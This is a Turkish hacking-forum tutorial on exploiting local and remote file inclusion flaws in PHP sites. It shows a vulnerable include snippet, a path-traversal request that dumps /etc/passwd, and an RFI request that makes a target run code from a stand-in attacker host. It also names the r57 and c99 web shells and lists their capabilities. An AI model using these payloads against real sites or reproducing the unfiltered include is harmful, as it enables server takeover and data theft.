Garez.Org | Hack Forum - Hacker Sitesi - Warez Forum - Crack Forum - Leak Nulled Forum
Neler yeni

Rfl-lfi Site Açıklarından Faydalanma Konu Anlatımı

Gizli içerikleri görüntülemek için konulara random / anlamsız mesaj yazmak ban sebebidir!

GuarDofErun

Çömez
Çömez
Katılım
19 Kas 2021
Mesajlar
242
Tepkime puanı
76
Puanları
1
RFI-LF

Selamun Aleyküm / Aleyküm Selam Arkadaşlar
rfı&lfı
file inclusion: dosya ekleme olarak tabir edilebilen bir zayıflıktır.
file inclusion saldırıları,php web yazılım dilinde karşılaşılan bir açıktır.kötü niyetli saldırganın yerel (local) uzaktan (remote) kod çalıştırmasına olanak sağlar.

RFI: (Remote File Inclusion): uzaktan dosya ekleyerek kod çalıştırmaktır
LFI: (Local File Inclusion): yerelden dosya ekleyerek kod çalıştırmaktır.
php web programlama dili ile kodlanmış uygulamalarda yazılımların tanımladıkları değişkene değer atamaması veya atanan değerlerin filtrelenmemesinden kaynaklanmaktadır.
aşağıda verdiğim örnek kod ile detayları uygulamalı olarak inceleyelim.

LFI(Local File İnclusion) Örnek
index.php
<?php include($_GET[’sayfa’]) ?

Bu gibi bağlantılar içeren bir web sitesinde aşağıda verdiğim gibi bağlantı istekleri oluşturulur.
index.php?sayfa=haberler.php
index.php?sayfa=duyurular.php

En basit görünümüyle böyle bir yazılım,LFI ( Local File İnclusion ) zayıflığını oluşturur.

index.php?sayfa=../../../../../../../../../etc/passwd
yukarıda verdiğim ../ ifadesi bulunduğu dizinden bir üst dizine çıkmayı sağlar ve /etc/passwd içeriğini ekrana yazdırır.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh

………….

RFI ( Remote File İnclusion ) Örnek:

index2.php

include (“$duyurular/guncel/duyuru.php”);
bu satırdaki “$” işareti bulunan parametreden doğan hatalı kodlama ile uzaktan dosya çağırmak mümkündür.
http://www.hedef.com/labs/index2.php?duyurular= http://saldirgan.net/listpatch.txt?&#8221;

yukarıdaki şekilde, http://saldırgan.net/listpatch.txt?
bulunan zararlı kodlar http://www.hedef.com üzerinde çalışacaktır.
bu noktada saldırgan yönlendirilen alanda shell ve listpatch isimleriyle tabir edilen kötü amaçlı kodları kullanarak sunucu üzerinde istenilen işlemleri gerçekleştirebilmektir.bunların en çok kullanılanları r57 ve c99 dur.

R57 ve özellikleri
R57 web üzerinden komut çalıştırma ,dizin atlatma,dosya düzenleme,yeni dosya oluşturma,dosya çalıştırma,veritabanı bağlantılarını görme,dosya içeriğini okuma,dosya yükleme,dosya indirme özellikleri ile sunucu üzerinde birçok yetkisiz gerçekleştirilmektedir.
 
Üst Alt